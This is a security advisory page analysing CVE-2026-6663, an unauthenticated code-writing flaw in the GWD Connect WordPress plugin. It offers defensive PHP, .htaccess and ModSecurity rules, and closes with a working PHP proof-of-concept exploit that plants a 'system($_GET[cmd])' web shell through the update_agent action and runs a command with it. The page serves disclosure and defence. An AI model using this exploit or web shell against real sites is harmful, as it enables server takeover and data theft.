Atomic Edge analysis of CVE-2026-6663 (metadata-based): This vulnerability in the GWD Connect plugin (graphic-web-design-inc) allows unauthenticated attackers to achieve limited code execution on unregistered installations when the API key is not configured (default state). The CVSS score is 4.8 (Medium) with a vector of AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N, indicating network-based exploitation with high attack complexity.
The root cause is a missing authorization check (CWE-862) in the plugin’s standalone agent endpoints, specifically gwd-backup.php and gwd-logs.php. These endpoints expose functionality for updating the agent file via the ‘update_agent’ action. The plugin fails to verify whether an API key has been configured or whether the requesting user is authenticated. Since the API key is not set by default, the authorization gate is effectively absent, leaving the endpoints open to anyone who can reach the files on a non-registered installation. This analysis is inferred from the CWE classification and vulnerability description; no source code was available for confirmation.
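The missing gate described above, written out as an added example for this page (it is not code from the GWD Connect plugin, whose source was not available for this analysis). It shows what a fail-closed authorization check at the top of a standalone endpoint such as gwd-backup.php should look like. The option names gwd_api_key and gwd_agent_sha256, the X-GWD-API-KEY request header, the nonce action gwd_update_agent, the agent.php file name and the standard wp-content/plugins directory layout are all assumptions chosen for illustration.

```php
<?php
// Added example, not the plugin's own code: a fail-closed authorization gate for a
// standalone agent endpoint. Option names, header name, nonce action and agent file
// name are assumptions (the real plugin's source was not available).

// Standalone plugin files run outside WordPress; bootstrap it so that options,
// users and capabilities are available. Four directory levels above
// wp-content/plugins/<plugin>/<file>.php is the site root (assumed layout).
require_once dirname(__FILE__, 4) . '/wp-load.php';

/**
 * Returns true only when the caller proves it may operate the agent.
 * Rule 1: an unconfigured API key denies everything. The default, unregistered
 *         state is exactly what left these endpoints open to anyone.
 * Rule 2: a configured key presented in a header is compared in constant time.
 * Rule 3: otherwise require a logged-in administrator with a valid nonce.
 */
function gwd_request_is_authorized(): bool
{
    $configured_key = (string) get_option('gwd_api_key', ''); // option name assumed
    if ($configured_key === '') {
        error_log('GWD Connect: agent endpoint called but no API key is configured; denying');
        return false;
    }

    $presented_key = isset($_SERVER['HTTP_X_GWD_API_KEY'])
        ? (string) $_SERVER['HTTP_X_GWD_API_KEY'] : '';
    if ($presented_key !== '' && hash_equals($configured_key, $presented_key)) {
        return true;
    }

    if (is_user_logged_in() && current_user_can('manage_options')) {
        $nonce = isset($_POST['_wpnonce']) ? (string) $_POST['_wpnonce'] : '';
        return wp_verify_nonce($nonce, 'gwd_update_agent') !== false; // nonce action assumed
    }

    return false;
}

// Gate every action, not only update_agent, before any request data is processed.
if (!gwd_request_is_authorized()) {
    status_header(403);
    header('Content-Type: text/plain');
    exit('Forbidden');
}

$action = isset($_POST['action']) ? (string) $_POST['action'] : '';

switch ($action) {
    case 'update_agent':
        // Even an authorized caller must not be able to drop arbitrary PHP on disk.
        // Accept a replacement agent only if its SHA-256 matches a hash the
        // administrator pinned beforehand (option name assumed), so the endpoint is an
        // integrity-checked updater rather than a write-anything primitive.
        $new_code = isset($_POST['code']) ? (string) $_POST['code'] : '';
        $pinned   = (string) get_option('gwd_agent_sha256', '');
        if ($pinned === '' || !hash_equals($pinned, hash('sha256', $new_code))) {
            status_header(400);
            exit('Agent content does not match the pinned hash');
        }
        // agent.php follows the advisory's guess at the agent file name.
        $bytes = file_put_contents(__DIR__ . '/agent.php', $new_code, LOCK_EX);
        if ($bytes === false) {
            status_header(500);
            exit('Write failed');
        }
        echo 'Agent updated';
        break;

    default:
        status_header(400);
        exit('Unknown action');
}
```

The decisive branch is the first one: an unset key must deny rather than allow, which turns the plugin's default state into a safe one. The pinned-hash check on update_agent goes a step beyond what the advisory asks for; it keeps the endpoint from serving as a write-arbitrary-PHP primitive even for a caller that holds the key.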
Exploitation requires an unregistered WordPress installation running the vulnerable plugin with no API key configured. The attacker sends a direct HTTP request to either /wp-content/plugins/graphic-web-design-inc/gwd-backup.php or /wp-content/plugins/graphic-web-design-inc/gwd-logs.php with an ‘action=update_agent’ parameter, along with a ‘code’ or ‘file_content’ parameter containing attacker-supplied PHP code. The vulnerable endpoint writes this code into the agent file (likely agent.php or similar) on the server. The attacker then executes the injected code by requesting the agent file directly.
Remediation requires adding proper authorization checks to both gwd-backup.php and gwd-logs.php. The fix should validate that a valid API key has been configured before processing any actions, especially update_agent. It should also verify the requesting user’s authentication status. Since no patched version is available, site administrators should either uninstall the plugin, restrict access to these files via .htaccess or server-level rules, or ensure the API key is set to a strong, non-guessable value.
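One way to apply the server-level restriction the remediation mentions, as an added example for this page (not an Atomic Edge rule): an Apache 2.4 .htaccess fragment placed in the plugin directory that denies direct web access to the two endpoints named in the advisory. The 203.0.113.0/24 range in the commented line is a documentation placeholder.

```apache
# Added example: deny direct web access to the two standalone agent endpoints
# named in the advisory. Save as wp-content/plugins/graphic-web-design-inc/.htaccess
# (Apache 2.4 syntax; AllowOverride must include AuthConfig or All for Require to apply).
<FilesMatch "^(?:gwd-backup|gwd-logs)\.php$">
    Require all denied
    # If the legitimate GWD agent must keep reaching these files, replace the line
    # above with an allow-list; 203.0.113.0/24 is a placeholder, not a real range.
    # Require ip 203.0.113.0/24
</FilesMatch>
```

This blocks the files at the web server before PHP runs, so it holds regardless of whether an API key has been configured. Verify the rule by requesting one of the files directly and confirming a 403, and remember that it also blocks any legitimate remote use of the agent until the plugin is patched.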
The impact includes limited code execution on the server. An unauthenticated attacker can write arbitrary PHP code to disk, enabling remote code execution. This could lead to full site compromise, data exfiltration, or use of the server for further attacks. The CVSS confidentiality and integrity impact scores are Low, likely because exploitation depends on specific environmental conditions (unregistered installation, no API key configured).
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-6663 (metadata-based)
# Block unauthenticated access to GWD Connect agent update endpoints
# The vulnerability allows writing PHP code via update_agent action
# Match both gwd-backup.php and gwd-logs.php with update_agent parameter
# REQUEST_FILENAME is used rather than REQUEST_URI so that a trailing query string
# cannot defeat the $ anchor; both parameter names named in the advisory are inspected
SecRule REQUEST_FILENAME "@rx /wp-content/plugins/graphic-web-design-inc/(?:gwd-backup|gwd-logs)\.php$" \
    "id:20266631,phase:2,deny,status:403,chain,msg:'CVE-2026-6663 GWD Connect Unauthenticated Code Execution',severity:'CRITICAL',tag:'CVE-2026-6663'"
    SecRule ARGS_POST:action "@streq update_agent" "chain"
        SecRule ARGS_POST:code|ARGS_POST:file_content "@rx \b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert|base64_decode|gzuncompress|file_put_contents|fwrite|fputs)\b" \
            "t:none,t:urlDecode"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6663 - GWD Connect <= 2.9 - Unauthenticated Limited Code Execution via update_agent

// Configuration - change these values
$target_url  = 'http://example.com';                          // Base URL of the WordPress installation
$plugin_path = '/wp-content/plugins/graphic-web-design-inc';  // Plugin directory path

// The malicious PHP code to inject (e.g., a simple web shell)
$php_payload = '<?php system($_GET["cmd"]); ?>';

// Two known vulnerable endpoints from the description
$endpoints = array(
    $target_url . $plugin_path . '/gwd-backup.php',
    $target_url . $plugin_path . '/gwd-logs.php'
);

$success = false;

// Try each endpoint
foreach ($endpoints as $endpoint) {
    echo "[+] Attempting endpoint: $endpoint\n";

    // POST action=update_agent with the payload in the 'code' parameter
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
        'action' => 'update_agent',
        'code'   => $php_payload
    )));
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/x-www-form-urlencoded'
    ));
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    // Check if the request was successful (HTTP 200) and response indicates success
    if ($http_code == 200 && $response !== false) {
        echo "[+] Endpoint responded with HTTP 200\n";

        // Try to verify by accessing the agent file
        $agent_url = $target_url . $plugin_path . '/agent.php'; // Common agent file name
        $check_ch  = curl_init();
        curl_setopt($check_ch, CURLOPT_URL, $agent_url . '?cmd=id');
        curl_setopt($check_ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($check_ch, CURLOPT_TIMEOUT, 10);
        $check_response = curl_exec($check_ch);
        $check_http     = curl_getinfo($check_ch, CURLINFO_HTTP_CODE);
        curl_close($check_ch);

        if ($check_http == 200 && !empty($check_response)) {
            echo "[+] Exploit successful! Agent file returned: $check_response\n";
            $success = true;
            break;
        } else {
            echo "[!] Endpoint responded but could not verify code execution. The agent file may have a different name or path.\n";
        }
    } else {
        echo "[!] Endpoint failed with HTTP $http_code\n";
    }
}

if (!$success) {
    echo "[!] Exploit failed. The target may not be vulnerable (API key configured, plugin patched, or not unregistered).\n";
    echo "[!] Alternative: Try different parameter names like 'file_content' or 'agent_code'.\n";
}